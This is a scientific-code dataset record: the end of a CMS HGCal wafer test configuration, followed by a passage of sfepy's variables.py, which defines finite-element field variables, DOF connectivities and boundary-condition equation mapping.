MinE = cms.double(9.99),
MaxE = cms.double(10.01)
),
AddAntiParticle = cms.bool(False),
Verbosity = cms.untracked.int32(0),
firstRun = cms.untracked.uint32(1)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
#process.hgcalEEWaferInFileTest.Verbosity = 1
process.hgcalHEWaferInFileTest = process.hgcalEEWaferInFileTest.clone(
NameSense = "HGCalHESiliconSensitive",
NameDevice = "HGCal HE Silicon",
)
process.p1 = cms.Path(process.generator*process.hgcalEEWaferInFileTest*process.hgcalHEWaferInFileTest)
|
sfepy/discrete/variables.py | BubuLK/sfepy | 510 | 11195067 | """
Classes of variables for equations/terms.
"""
from __future__ import print_function
from __future__ import absolute_import
from collections import deque
import numpy as nm
from sfepy.base.base import (real_types, complex_types, assert_, get_default,
output, OneTypeList, Container, Struct, basestr,
iter_dict_of_lists)
from sfepy.base.timing import Timer
import sfepy.linalg as la
from sfepy.discrete.functions import Function
from sfepy.discrete.conditions import get_condition_value
from sfepy.discrete.integrals import Integral
from sfepy.discrete.common.dof_info import (DofInfo, EquationMap,
expand_nodes_to_equations,
is_active_bc)
from sfepy.discrete.fem.lcbc_operators import LCBCOperators
from sfepy.discrete.common.mappings import get_physical_qps
from sfepy.discrete.evaluate_variable import eval_real, eval_complex
import six
from six.moves import range
is_state = 0
is_virtual = 1
is_parameter = 2
is_field = 10
def create_adof_conns(conn_info, var_indx=None, active_only=True, verbose=True):
"""
Create active DOF connectivities for all variables referenced in
`conn_info`.
    If a variable does not have an equation mapping, a trivial mapping is
    assumed and a connectivity with all DOFs active is created.
DOF connectivity key is a tuple ``(primary variable name, region name,
type, is_trace flag)``.
Notes
-----
If `active_only` is False, the DOF connectivities contain all DOFs, with
the E(P)BC-constrained ones stored as `-1 - <DOF number>`, so that the full
connectivities can be reconstructed for the matrix graph creation.
"""
var_indx = get_default(var_indx, {})
def _create(var, econn):
offset = var_indx.get(var.name, slice(0, 0)).start
if var.eq_map is None:
eq = nm.arange(var.n_dof, dtype=nm.int32)
else:
if isinstance(var, DGFieldVariable):
eq = nm.arange(var.n_dof, dtype=nm.int32)
else:
if active_only:
eq = var.eq_map.eq
else:
eq = nm.arange(var.n_dof, dtype=nm.int32)
eq[var.eq_map.eq_ebc] = -1 - (var.eq_map.eq_ebc + offset)
eq[var.eq_map.master] = eq[var.eq_map.slave]
adc = create_adof_conn(eq, econn, var.n_components, offset)
return adc
def _assign(adof_conns, info, region, var, field, is_trace):
key = (var.name, region.name, info.dc_type.type, is_trace)
if not key in adof_conns:
econn = field.get_econn(info.dc_type, region, is_trace=is_trace)
if econn is None: return
adof_conns[key] = _create(var, econn)
if info.is_trace:
key = (var.name, region.name, info.dc_type.type, False)
if not key in adof_conns:
econn = field.get_econn(info.dc_type, region, is_trace=False)
adof_conns[key] = _create(var, econn)
if verbose:
output('setting up dof connectivities...')
timer = Timer(start=True)
adof_conns = {}
for key, ii, info in iter_dict_of_lists(conn_info, return_keys=True):
if info.primary is not None:
var = info.primary
field = var.get_field()
field.setup_extra_data(info.ps_tg, info, info.is_trace)
region = info.get_region()
_assign(adof_conns, info, region, var, field, info.is_trace)
if info.has_virtual and not info.is_trace:
var = info.virtual
field = var.get_field()
field.setup_extra_data(info.v_tg, info, False)
aux = var.get_primary()
var = aux if aux is not None else var
region = info.get_region(can_trace=False)
_assign(adof_conns, info, region, var, field, False)
if verbose:
output('...done in %.2f s' % timer.stop())
return adof_conns
def create_adof_conn(eq, conn, dpn, offset):
"""
Given a node connectivity, number of DOFs per node and equation mapping,
create the active dof connectivity.
Locally (in a connectivity row), the DOFs are stored DOF-by-DOF (u_0 in all
local nodes, u_1 in all local nodes, ...).
Globally (in a state vector), the DOFs are stored node-by-node (u_0, u_1,
..., u_X in node 0, u_0, u_1, ..., u_X in node 1, ...).
"""
if dpn == 1:
aux = nm.take(eq, conn)
adc = aux + nm.asarray(offset * (aux >= 0), dtype=nm.int32)
else:
n_el, n_ep = conn.shape
adc = nm.empty((n_el, n_ep * dpn), dtype=conn.dtype)
ii = 0
for idof in range(dpn):
aux = nm.take(eq, dpn * conn + idof)
adc[:, ii : ii + n_ep] = aux + nm.asarray(offset * (aux >= 0),
dtype=nm.int32)
ii += n_ep
return adc
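# Worked example (a minimal sketch, not part of sfepy): with dpn = 2, offset = 0,
# a single cell conn = [[0, 1]] and the identity mapping eq = [0, 1, 2, 3],
# the active DOF connectivity row becomes [0, 2, 1, 3] - DOF 0 of both nodes
# first, then DOF 1 of both nodes, matching the local DOF-by-DOF ordering
# described in the docstring above.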
def expand_basis(basis, dpn):
"""
Expand basis for variables with several components (DOFs per node), in a
way compatible with :func:`create_adof_conn()`, according to `dpn`
(DOF-per-node count).
"""
n_c, n_bf = basis.shape[-2:]
ebasis = nm.zeros(basis.shape[:2] + (dpn, n_bf * dpn), dtype=nm.float64)
for ic in range(n_c):
for ir in range(dpn):
ebasis[..., n_c*ir+ic, ir*n_bf:(ir+1)*n_bf] = basis[..., ic, :]
return ebasis
class Variables(Container):
"""
Container holding instances of Variable.
"""
@staticmethod
def from_conf(conf, fields):
"""
This method resets the variable counters for automatic order!
"""
Variable.reset()
obj = Variables()
for key, val in six.iteritems(conf):
var = Variable.from_conf(key, val, fields)
obj[var.name] = var
obj.setup_dtype()
obj.setup_ordering()
return obj
def __init__(self, variables=None):
Container.__init__(self, OneTypeList(Variable),
state=set(),
virtual=set(),
parameter=set(),
has_virtual_dcs=False,
has_lcbc=False,
has_lcbc_rhs=False,
has_eq_map=False,
ordered_state=[],
ordered_virtual=[])
if variables is not None:
for var in variables:
self[var.name] = var
self.setup_ordering()
self.setup_dtype()
self.adof_conns = {}
def __setitem__(self, ii, var):
Container.__setitem__(self, ii, var)
if var.is_state():
self.state.add(var.name)
elif var.is_virtual():
self.virtual.add(var.name)
elif var.is_parameter():
self.parameter.add(var.name)
var._variables = self
self.setup_ordering()
self.setup_dof_info()
def setup_dtype(self):
"""
Setup data types of state variables - all have to be of the same
data type, one of nm.float64 or nm.complex128.
"""
dtypes = {nm.complex128 : 0, nm.float64 : 0}
for var in self.iter_state(ordered=False):
dtypes[var.dtype] += 1
if dtypes[nm.float64] and dtypes[nm.complex128]:
raise ValueError("All variables must have the same dtype!")
elif dtypes[nm.float64]:
self.dtype = nm.float64
elif dtypes[nm.complex128]:
self.dtype = nm.complex128
else:
self.dtype = None
def link_duals(self):
"""
Link state variables with corresponding virtual variables,
        and assign a link to this container to each variable instance.
Usually, when solving a PDE in the weak form, each state
variable has a corresponding virtual variable.
"""
for ii in self.state:
self[ii].dual_var_name = None
for ii in self.virtual:
vvar = self[ii]
try:
self[vvar.primary_var_name].dual_var_name = vvar.name
except IndexError:
pass
def get_dual_names(self):
"""
Get names of pairs of dual variables.
Returns
-------
duals : dict
The dual names as virtual name : state name pairs.
"""
duals = {}
for name in self.virtual:
duals[name] = self[name].primary_var_name
return duals
def setup_ordering(self):
"""
Setup ordering of variables.
"""
self.link_duals()
orders = []
for var in self:
try:
orders.append(var._order)
except:
pass
orders.sort()
self.ordered_state = [None] * len(self.state)
for var in self.iter_state(ordered=False):
ii = orders.index(var._order)
self.ordered_state[ii] = var.name
self.ordered_virtual = [None] * len(self.virtual)
ii = 0
for var in self.iter_state(ordered=False):
if var.dual_var_name is not None:
self.ordered_virtual[ii] = var.dual_var_name
ii += 1
def has_virtuals(self):
return len(self.virtual) > 0
def setup_dof_info(self, make_virtual=False):
"""
Setup global DOF information.
"""
self.di = DofInfo('state_dof_info')
for var_name in self.ordered_state:
self.di.append_variable(self[var_name])
if make_virtual:
self.vdi = DofInfo('virtual_dof_info')
for var_name in self.ordered_virtual:
self.vdi.append_variable(self[var_name])
else:
self.vdi = self.di
def setup_lcbc_operators(self, lcbcs, ts=None, functions=None):
"""
Prepare linear combination BC operator matrix and right-hand side
vector.
"""
from sfepy.discrete.common.region import are_disjoint
if lcbcs is None:
self.lcdi = self.adi
return
self.lcbcs = lcbcs
if (ts is None) or ((ts is not None) and (ts.step == 0)):
regs = []
var_names = []
for bcs in self.lcbcs:
for bc in bcs.iter_single():
vns = bc.get_var_names()
regs.append(bc.regions[0])
var_names.append(vns[0])
if bc.regions[1] is not None:
regs.append(bc.regions[1])
var_names.append(vns[1])
for i0 in range(len(regs) - 1):
for i1 in range(i0 + 1, len(regs)):
if ((var_names[i0] == var_names[i1])
and not are_disjoint(regs[i0], regs[i1])):
raise ValueError('regions %s and %s are not disjoint!'
% (regs[i0].name, regs[i1].name))
ops = LCBCOperators('lcbcs', self, functions=functions)
for bcs in self.lcbcs:
for bc in bcs.iter_single():
vns = bc.get_var_names()
dofs = [self[vn].dofs for vn in vns if vn is not None]
bc.canonize_dof_names(*dofs)
if not is_active_bc(bc, ts=ts, functions=functions):
continue
output('lcbc:', bc.name)
ops.add_from_bc(bc, ts)
aux = ops.make_global_operator(self.adi)
self.mtx_lcbc, self.vec_lcbc, self.lcdi = aux
self.has_lcbc = self.mtx_lcbc is not None
self.has_lcbc_rhs = self.vec_lcbc is not None
def get_lcbc_operator(self):
if self.has_lcbc:
return self.mtx_lcbc
else:
raise ValueError('no LCBC defined!')
def equation_mapping(self, ebcs, epbcs, ts, functions, problem=None,
active_only=True):
"""
Create the mapping of active DOFs from/to all DOFs for all state
variables.
Parameters
----------
ebcs : Conditions instance
The essential (Dirichlet) boundary conditions.
epbcs : Conditions instance
The periodic boundary conditions.
ts : TimeStepper instance
The time stepper.
functions : Functions instance
The user functions for boundary conditions.
problem : Problem instance, optional
The problem that can be passed to user functions as a context.
active_only : bool
If True, the active DOF info ``self.adi`` uses the reduced (active
DOFs only) numbering. Otherwise it is the same as ``self.di``.
Returns
-------
active_bcs : set
The set of boundary conditions active in the current time.
"""
self.ebcs = ebcs
self.epbcs = epbcs
##
        # Assign EBC, PBC to variables and regions.
if ebcs is not None:
self.bc_of_vars = self.ebcs.group_by_variables()
else:
self.bc_of_vars = {}
if epbcs is not None:
self.bc_of_vars = self.epbcs.group_by_variables(self.bc_of_vars)
##
# List EBC nodes/dofs for each variable.
active_bcs = set()
for var_name in self.di.var_names:
var = self[var_name]
bcs = self.bc_of_vars.get(var.name, None)
var_di = self.di.get_info(var_name)
active = var.equation_mapping(bcs, var_di, ts, functions,
problem=problem)
active_bcs.update(active)
if self.has_virtual_dcs:
vvar = self[var.dual_var_name]
vvar_di = self.vdi.get_info(var_name)
active = vvar.equation_mapping(bcs, vvar_di, ts, functions,
problem=problem)
active_bcs.update(active)
self.adi = DofInfo('active_state_dof_info')
for var_name in self.ordered_state:
self.adi.append_variable(self[var_name], active=active_only)
if self.has_virtual_dcs:
self.avdi = DofInfo('active_virtual_dof_info')
for var_name in self.ordered_virtual:
self.avdi.append_variable(self[var_name], active=active_only)
else:
self.avdi = self.adi
self.has_eq_map = True
return active_bcs
def get_matrix_shape(self):
if not self.has_eq_map:
raise ValueError('call equation_mapping() first!')
return (self.avdi.ptr[-1], self.adi.ptr[-1])
def setup_initial_conditions(self, ics, functions):
self.ics = ics
self.ic_of_vars = self.ics.group_by_variables()
for var_name in self.di.var_names:
var = self[var_name]
ics = self.ic_of_vars.get(var.name, None)
if ics is None: continue
var.setup_initial_conditions(ics, self.di, functions)
for var_name in self.parameter:
var = self[var_name]
if hasattr(var, 'special') and ('ic' in var.special):
setter, sargs, skwargs = var._get_setter('ic', functions)
var.set_data(setter(*sargs, **skwargs))
output('IC data of %s set by %s()' % (var.name, setter.name))
def set_adof_conns(self, adof_conns):
"""
Set all active DOF connectivities to `self` as well as relevant
sub-dicts to the individual variables.
"""
self.adof_conns = adof_conns
for var in self:
var.adof_conns = {}
for key, val in six.iteritems(adof_conns):
if key[0] in self.names:
var = self[key[0]]
var.adof_conns[key] = val
var = var.get_dual()
if var is not None:
var.adof_conns[key] = val
def create_state_vector(self):
vec = nm.zeros((self.di.ptr[-1],), dtype=self.dtype)
return vec
def create_stripped_state_vector(self):
vec = nm.zeros((self.adi.ptr[-1],), dtype=self.dtype)
return vec
def apply_ebc(self, vec, force_values=None):
"""
Apply essential (Dirichlet) and periodic boundary conditions
defined for the state variables to vector `vec`.
"""
for var in self.iter_state():
var.apply_ebc(vec, self.di.indx[var.name].start, force_values)
def apply_ic(self, vec, force_values=None):
"""
Apply initial conditions defined for the state variables to
vector `vec`.
"""
for var in self.iter_state():
var.apply_ic(vec, self.di.indx[var.name].start, force_values)
def strip_state_vector(self, vec, follow_epbc=False, svec=None):
"""
Get the reduced DOF vector, with EBC and PBC DOFs removed.
Notes
-----
If 'follow_epbc' is True, values of EPBC master dofs are not simply
thrown away, but added to the corresponding slave dofs, just like when
assembling. For vectors with state (unknown) variables it should be set
to False, for assembled vectors it should be set to True.
"""
if svec is None:
svec = nm.empty((self.adi.ptr[-1],), dtype=self.dtype)
for var in self.iter_state():
aindx = self.adi.indx[var.name]
svec[aindx] = var.get_reduced(vec, self.di.indx[var.name].start,
follow_epbc)
return svec
def make_full_vec(self, svec, force_value=None, vec=None):
"""
Make a full DOF vector satisfying E(P)BCs from a reduced DOF
vector.
Parameters
----------
svec : array
The reduced DOF vector.
force_value : float, optional
Passing a `force_value` overrides the EBC values.
vec : array, optional
If given, the buffer for storing the result (zeroed).
Returns
-------
vec : array
The full DOF vector.
"""
self.check_vector_size(svec, stripped=True)
if self.has_lcbc:
if self.has_lcbc_rhs:
svec = self.mtx_lcbc * svec + self.vec_lcbc
else:
svec = self.mtx_lcbc * svec
if vec is None:
vec = self.create_state_vector()
for var in self.iter_state():
indx = self.di.indx[var.name]
aindx = self.adi.indx[var.name]
var.get_full(svec, aindx.start, force_value, vec, indx.start)
return vec
def has_ebc(self, vec, force_values=None):
for var_name in self.di.var_names:
eq_map = self[var_name].eq_map
i0 = self.di.indx[var_name].start
ii = i0 + eq_map.eq_ebc
if force_values is None:
if not nm.allclose(vec[ii], eq_map.val_ebc):
return False
else:
if isinstance(force_values, dict):
if not nm.allclose(vec[ii], force_values[var_name]):
return False
else:
if not nm.allclose(vec[ii], force_values):
return False
# EPBC.
if not nm.allclose(vec[i0+eq_map.master], vec[i0+eq_map.slave]):
return False
return True
def get_indx(self, var_name, stripped=False, allow_dual=False):
var = self[var_name]
if not var.is_state():
if allow_dual and var.is_virtual():
var_name = var.primary_var_name
else:
msg = '%s is not a state part' % var_name
raise IndexError(msg)
if stripped:
return self.adi.indx[var_name]
else:
return self.di.indx[var_name]
def check_vector_size(self, vec, stripped=False):
"""
Check whether the shape of the DOF vector corresponds to the
total number of DOFs of the state variables.
Parameters
----------
vec : array
The vector of DOF values.
stripped : bool
If True, the size of the DOF vector should be reduced,
i.e. without DOFs fixed by boundary conditions.
"""
if not stripped:
n_dof = self.di.get_n_dof_total()
if vec.size != n_dof:
msg = 'incompatible data size!' \
' (%d (variables) == %d (DOF vector))' \
% (n_dof, vec.size)
raise ValueError(msg)
else:
if self.has_lcbc:
n_dof = self.lcdi.get_n_dof_total()
else:
n_dof = self.adi.get_n_dof_total()
if vec.size != n_dof:
msg = 'incompatible data size!' \
' (%d (active variables) == %d (reduced DOF vector))' \
% (n_dof, vec.size)
raise ValueError(msg)
def get_state_part_view(self, state, var_name, stripped=False):
self.check_vector_size(state, stripped=stripped)
return state[self.get_indx(var_name, stripped)]
def set_state_part(self, state, part, var_name, stripped=False):
self.check_vector_size(state, stripped=stripped)
state[self.get_indx(var_name, stripped)] = part
def get_state_parts(self, vec=None):
"""
Return parts of a state vector corresponding to individual state
variables.
Parameters
----------
vec : array, optional
The state vector. If not given, then the data stored in the
variables are returned instead.
Returns
-------
out : dict
The dictionary of the state parts.
"""
if vec is not None:
self.check_vector_size(vec)
out = {}
for var in self.iter_state():
if vec is None:
out[var.name] = var()
else:
out[var.name] = vec[self.di.indx[var.name]]
return out
def set_data(self, data, step=0, ignore_unknown=False,
preserve_caches=False):
"""
Set data (vectors of DOF values) of variables.
Parameters
----------
data : array
The state vector or dictionary of {variable_name : data vector}.
step : int, optional
The time history step, 0 (default) = current.
ignore_unknown : bool, optional
Ignore unknown variable names if `data` is a dict.
preserve_caches : bool
If True, do not invalidate evaluate caches of variables.
"""
if data is None: return
if isinstance(data, dict):
for key, val in six.iteritems(data):
try:
var = self[key]
except (ValueError, IndexError):
if ignore_unknown:
pass
else:
raise KeyError('unknown variable! (%s)' % key)
else:
var.set_data(val, step=step,
preserve_caches=preserve_caches)
elif isinstance(data, nm.ndarray):
self.check_vector_size(data)
for ii in self.state:
var = self[ii]
var.set_data(data, self.di.indx[var.name], step=step,
preserve_caches=preserve_caches)
else:
raise ValueError('unknown data class! (%s)' % data.__class__)
def set_from_state(self, var_names, state, var_names_state):
"""
Set variables with names in `var_names` from state variables with names
in `var_names_state` using DOF values in the state vector `state`.
"""
self.check_vector_size(state)
if isinstance(var_names, basestr):
var_names = [var_names]
var_names_state = [var_names_state]
for ii, var_name in enumerate(var_names):
var_name_state = var_names_state[ii]
if self[var_name_state].is_state():
self[var_name].set_data(state, self.di.indx[var_name_state])
else:
msg = '%s is not a state part' % var_name_state
raise IndexError(msg)
def state_to_output(self, vec, fill_value=None, var_info=None,
extend=True, linearization=None):
"""
Convert a state vector to a dictionary of output data usable by
Mesh.write().
"""
di = self.di
if var_info is None:
self.check_vector_size(vec)
var_info = {}
for name in di.var_names:
var_info[name] = (False, name)
out = {}
for key, indx in six.iteritems(di.indx):
var = self[key]
if key not in list(var_info.keys()): continue
is_part, name = var_info[key]
if is_part:
aux = vec
else:
aux = vec[indx]
out.update(var.create_output(aux, key=name, extend=extend,
fill_value=fill_value,
linearization=linearization))
return out
def iter_state(self, ordered=True):
if ordered:
for ii in self.ordered_state:
yield self[ii]
else:
for ii in self.state:
yield self[ii]
def init_history(self):
for var in self.iter_state():
var.init_history()
def time_update(self, ts, functions, verbose=True):
if verbose:
output('updating variables...')
for var in self:
var.time_update(ts, functions)
if verbose:
output('...done')
def advance(self, ts):
for var in self.iter_state():
var.advance(ts)
class Variable(Struct):
_count = 0
_orders = []
_all_var_names = set()
@staticmethod
def reset():
Variable._count = 0
Variable._orders = []
Variable._all_var_names = set()
@staticmethod
def from_conf(key, conf, fields):
aux = conf.kind.split()
if len(aux) == 2:
kind, family = aux
elif len(aux) == 3:
kind, family = aux[0], '_'.join(aux[1:])
else:
raise ValueError('variable kind is 2 or 3 words! (%s)' % conf.kind)
history = conf.get('history', None)
if history is not None:
try:
history = int(history)
assert_(history >= 0)
except (ValueError, TypeError):
raise ValueError('history must be integer >= 0! (got "%s")'
% history)
order = conf.get('order', None)
if order is not None:
order = int(order)
primary_var_name = conf.get('dual', None)
if primary_var_name is None:
if hasattr(conf, 'like'):
primary_var_name = get_default(conf.like, '(set-to-None)')
else:
primary_var_name = None
special = conf.get('special', None)
if family == 'field':
try:
fld = fields[conf.field]
except IndexError:
msg = 'field "%s" does not exist!' % conf.field
raise KeyError(msg)
if "DG" in fld.family_name:
obj = DGFieldVariable(conf.name, kind, fld, order, primary_var_name,
special=special, key=key, history=history)
else:
obj = FieldVariable(conf.name, kind, fld, order, primary_var_name,
special=special, key=key, history=history)
else:
raise ValueError('unknown variable family! (%s)' % family)
return obj
def __init__(self, name, kind, order=None, primary_var_name=None,
special=None, flags=None, **kwargs):
Struct.__init__(self, name=name, **kwargs)
self.flags = set()
if flags is not None:
for flag in flags:
self.flags.add(flag)
self.indx = slice(None)
self.n_dof = None
self.step = 0
self.dt = 1.0
self.initial_condition = None
self.dual_var_name = None
self.eq_map = None
if self.is_virtual():
self.data = None
else:
self.data = deque()
self.data.append(None)
self._set_kind(kind, order, primary_var_name, special=special)
Variable._all_var_names.add(name)
def _set_kind(self, kind, order, primary_var_name, special=None):
if kind == 'unknown':
self.flags.add(is_state)
if order is not None:
if order in Variable._orders:
raise ValueError('order %d already used!' % order)
else:
self._order = order
Variable._orders.append(order)
else:
self._order = Variable._count
Variable._orders.append(self._order)
Variable._count += 1
self.dof_name = self.name
elif kind == 'test':
if primary_var_name == self.name:
raise ValueError('primary variable for %s cannot be %s!'
% (self.name, primary_var_name))
self.flags.add(is_virtual)
msg = 'test variable %s: related unknown missing' % self.name
self.primary_var_name = get_default(primary_var_name, None, msg)
self.dof_name = self.primary_var_name
elif kind == 'parameter':
self.flags.add(is_parameter)
msg = 'parameter variable %s: related unknown missing' % self.name
self.primary_var_name = get_default(primary_var_name, None, msg)
if self.primary_var_name == '(set-to-None)':
self.primary_var_name = None
self.dof_name = self.name
else:
self.dof_name = self.primary_var_name
if special is not None:
self.special = special
else:
raise NotImplementedError('unknown variable kind: %s' % kind)
self.kind = kind
def _setup_dofs(self, n_nod, n_components, val_shape):
"""
Setup number of DOFs and DOF names.
"""
self.n_nod = n_nod
self.n_components = n_components
self.val_shape = val_shape
self.n_dof = self.n_nod * self.n_components
self.dofs = [self.dof_name + ('.%d' % ii)
for ii in range(self.n_components)]
def get_primary(self):
"""
Get the corresponding primary variable.
Returns
-------
var : Variable instance
            The primary variable: `self` for state variables or when
            `primary_var_name` is None, otherwise the variable named
            `primary_var_name`, or None if that variable is not defined.
"""
if self.is_state():
var = self
elif self.primary_var_name is not None:
if ((self._variables is not None)
and (self.primary_var_name in self._variables.names)):
var = self._variables[self.primary_var_name]
else:
var = None
else:
var = self
return var
def get_dual(self):
"""
Get the dual variable.
Returns
-------
var : Variable instance
The primary variable for non-state variables, or the dual
variable for state variables.
"""
if self.is_state():
if ((self._variables is not None)
and (self.dual_var_name in self._variables.names)):
var = self._variables[self.dual_var_name]
else:
var = None
else:
if ((self._variables is not None)
and (self.primary_var_name in self._variables.names)):
var = self._variables[self.primary_var_name]
else:
var = None
return var
def is_state(self):
return is_state in self.flags
def is_virtual(self):
return is_virtual in self.flags
def is_parameter(self):
return is_parameter in self.flags
def is_state_or_parameter(self):
return (is_state in self.flags) or (is_parameter in self.flags)
def is_kind(self, kind):
return eval('self.is_%s()' % kind)
def is_real(self):
return self.dtype in real_types
def is_complex(self):
return self.dtype in complex_types
def is_finite(self, step=0, derivative=None, dt=None):
return nm.isfinite(self(step=step, derivative=derivative, dt=dt)).all()
def get_primary_name(self):
if self.is_state():
name = self.name
else:
name = self.primary_var_name
return name
def init_history(self):
"""Initialize data of variables with history."""
if self.history is None: return
self.data = deque((self.history + 1) * [None])
self.step = 0
def time_update(self, ts, functions):
"""Implemented in subclasses."""
pass
def advance(self, ts):
"""
Advance in time the DOF state history. A copy of the DOF vector
is made to prevent history modification.
"""
if self.history is None: return
self.step = ts.step + 1
if self.history > 0:
# Copy the current step data to the history data, shift history,
# initialize if needed. The current step data are left intact.
# Note: cannot use self.data.rotate() due to data sharing with
# State.
for ii in range(self.history, 0, -1):
if self.data[ii] is None:
self.data[ii] = nm.empty_like(self.data[0])
self.data[ii][:] = self.data[ii - 1]
# Advance evaluate cache.
for step_cache in six.itervalues(self.evaluate_cache):
steps = sorted(step_cache.keys())
for step in steps:
if step is None:
# Special caches with possible custom advance()
# function.
for key, val in six.iteritems(step_cache[step]):
if hasattr(val, '__advance__'):
val.__advance__(ts, val)
elif -step < self.history:
step_cache[step-1] = step_cache[step]
if len(steps) and (steps[0] is not None):
step_cache.pop(steps[-1])
def init_data(self, step=0):
"""
Initialize the dof vector data of time step `step` to zeros.
"""
if self.is_state_or_parameter():
data = nm.zeros((self.n_dof,), dtype=self.dtype)
self.set_data(data, step=step)
def set_constant(self, val):
"""
Set the variable to a constant value.
"""
data = nm.empty((self.n_dof,), dtype=self.dtype)
data.fill(val)
self.set_data(data)
def set_data(self, data=None, indx=None, step=0,
preserve_caches=False):
"""
Set data (vector of DOF values) of the variable.
Parameters
----------
data : array
The vector of DOF values.
indx : int, optional
If given, `data[indx]` is used.
step : int, optional
The time history step, 0 (default) = current.
preserve_caches : bool
If True, do not invalidate evaluate caches of the variable.
"""
data = data.ravel()
if indx is None:
indx = slice(0, len(data))
else:
indx = slice(int(indx.start), int(indx.stop))
n_data_dof = indx.stop - indx.start
if self.n_dof != n_data_dof:
msg = 'incompatible data shape! (%d (variable) == %d (data))' \
% (self.n_dof, n_data_dof)
raise ValueError(msg)
elif (step > 0) or (-step >= len(self.data)):
raise ValueError('step %d out of range! ([%d, 0])'
% (step, -(len(self.data) - 1)))
else:
self.data[step] = data
self.indx = indx
if not preserve_caches:
self.invalidate_evaluate_cache(step=step)
def __call__(self, step=0, derivative=None, dt=None):
"""
Return vector of degrees of freedom of the variable.
Parameters
----------
step : int, default 0
The time step (0 means current, -1 previous, ...).
derivative : None or 'dt'
If not None, return time derivative of the DOF vector,
approximated by the backward finite difference.
Returns
-------
vec : array
The DOF vector. If `derivative` is None: a view of the data vector,
otherwise: required derivative of the DOF vector
at time step given by `step`.
Notes
-----
If the previous time step is requested in step 0, the step 0
DOF vector is returned instead.
"""
if derivative is None:
if (self.step == 0) and (step == -1):
data = self.data[0]
else:
data = self.data[-step]
if data is None:
raise ValueError('data of variable are not set! (%s, step %d)' \
% (self.name, step))
return data[self.indx]
else:
if self.history is None:
msg = 'set history type of variable %s to use derivatives!'\
% self.name
raise ValueError(msg)
dt = get_default(dt, self.dt)
return (self(step=step) - self(step=step-1)) / dt
def get_initial_condition(self):
if self.initial_condition is None:
return 0.0
else:
return self.initial_condition
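# A small sketch (hypothetical helper): reading the DOF vector of a state
# variable with history, and its backward-difference time derivative, as
# provided by Variable.__call__() above.
def _example_read_variable_dofs(var, dt=0.1):
    u_now = var()                        # current DOF vector (step 0)
    u_prev = var(step=-1)                # previous time step
    du_dt = var(derivative='dt', dt=dt)  # approx. (u_now - u_prev) / dt
    return u_now, u_prev, du_dt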
class FieldVariable(Variable):
"""
A finite element field variable.
field .. field description of variable (borrowed)
"""
def __init__(self, name, kind, field, order=None, primary_var_name=None,
special=None, flags=None, history=None, **kwargs):
Variable.__init__(self, name, kind, order, primary_var_name,
special, flags, history=history, **kwargs)
self._set_field(field)
self.has_field = True
self.has_bc = True
self._variables = None
self.clear_evaluate_cache()
def _set_field(self, field):
"""
Set field of the variable.
Takes reference to a Field instance. Sets dtype according to
field.dtype. Sets `dim` attribute to spatial dimension.
"""
self.is_surface = field.is_surface
self.field = field
self._setup_dofs(field.n_nod, field.n_components, field.val_shape)
self.flags.add(is_field)
self.dtype = field.dtype
self.dim = field.domain.shape.dim
def _get_setter(self, kind, functions, **kwargs):
"""
        Get the setter function of the variable and its arguments depending
        on the setter kind.
"""
if not (hasattr(self, 'special') and (kind in self.special)):
return
setter_name = self.special[kind]
setter = functions[setter_name]
region = self.field.region
nod_list = self.field.get_dofs_in_region(region)
nods = nm.unique(nod_list)
coors = self.field.get_coor(nods)
if kind == 'setter':
sargs = (kwargs.get('ts'), coors)
elif kind == 'ic':
sargs = (coors, )
skwargs = {'region' : region}
return setter, sargs, skwargs
def get_field(self):
return self.field
def get_mapping(self, region, integral, integration,
get_saved=False, return_key=False):
"""
Get the reference element mapping of the underlying field.
See Also
--------
sfepy.discrete.common.fields.Field.get_mapping
"""
if region is None:
region = self.field.region
out = self.field.get_mapping(region, integral, integration,
get_saved=get_saved,
return_key=return_key)
return out
def get_dof_conn(self, dc_type, is_trace=False, trace_region=None):
"""
Get active dof connectivity of a variable.
Notes
-----
The primary and dual variables must have the same Region.
"""
if self.is_virtual():
var = self.get_primary()
# No primary variable can occur in single term evaluations.
var_name = var.name if var is not None else self.name
else:
var_name = self.name
if not is_trace:
region_name = dc_type.region_name
else:
aux = self.field.domain.regions[dc_type.region_name]
region = aux.get_mirror_region(trace_region)
region_name = region.name
key = (var_name, region_name, dc_type.type, is_trace)
dc = self.adof_conns[key]
return dc
def get_dof_info(self, active=False):
details = Struct(name='field_var_dof_details',
n_nod=self.n_nod,
dpn=self.n_components)
if active:
n_dof = self.n_adof
else:
n_dof = self.n_dof
return n_dof, details
def time_update(self, ts, functions):
"""
Store time step, set variable data for variables with the setter
function.
"""
if ts is not None:
self.dt = ts.dt
if hasattr(self, 'special') and ('setter' in self.special):
setter, sargs, skwargs = self._get_setter('setter', functions,
ts=ts)
self.set_data(setter(*sargs, **skwargs))
output('data of %s set by %s()' % (self.name, setter.name))
def set_from_qp(self, data_qp, integral, step=0):
"""
Set DOFs of variable using values in quadrature points
corresponding to the given integral.
"""
data_vertex = self.field.average_qp_to_vertices(data_qp, integral)
# Field nodes values.
data = self.field.interp_v_vals_to_n_vals(data_vertex)
data = data.ravel()
self.indx = slice(0, len(data))
self.data[step] = data
def set_from_mesh_vertices(self, data):
"""
Set the variable using values at the mesh vertices.
"""
ndata = self.field.interp_v_vals_to_n_vals(data)
self.set_data(ndata)
def set_from_function(self, fun, step=0):
"""
Set the variable data (the vector of DOF values) using a function of
space coordinates.
Parameters
----------
fun : callable
The function of coordinates returning DOF values of shape
`(n_coor, n_components)`.
step : int, optional
The time history step, 0 (default) = current.
"""
_, vv = self.field.set_dofs(fun, self.field.region, self.n_components)
self.set_data(vv.ravel(), step=step)
def equation_mapping(self, bcs, var_di, ts, functions, problem=None,
warn=False):
"""
Create the mapping of active DOFs from/to all DOFs.
Sets n_adof.
Returns
-------
active_bcs : set
The set of boundary conditions active in the current time.
"""
self.eq_map = EquationMap('eq_map', self.dofs, var_di)
if bcs is not None:
bcs.canonize_dof_names(self.dofs)
bcs.sort()
active_bcs = self.eq_map.map_equations(bcs, self.field, ts, functions,
problem=problem, warn=warn)
self.n_adof = self.eq_map.n_eq
return active_bcs
def setup_initial_conditions(self, ics, di, functions, warn=False):
"""
Setup of initial conditions.
"""
ics.canonize_dof_names(self.dofs)
ics.sort()
self.initial_condition = nm.zeros((di.n_dof[self.name],),
dtype=self.dtype)
for ic in ics:
region = ic.region
dofs, val = ic.dofs
if warn:
clean_msg = ('warning: ignoring nonexistent' \
' IC node (%s) in ' % self.name)
else:
clean_msg = None
nod_list = self.field.get_dofs_in_region(region)
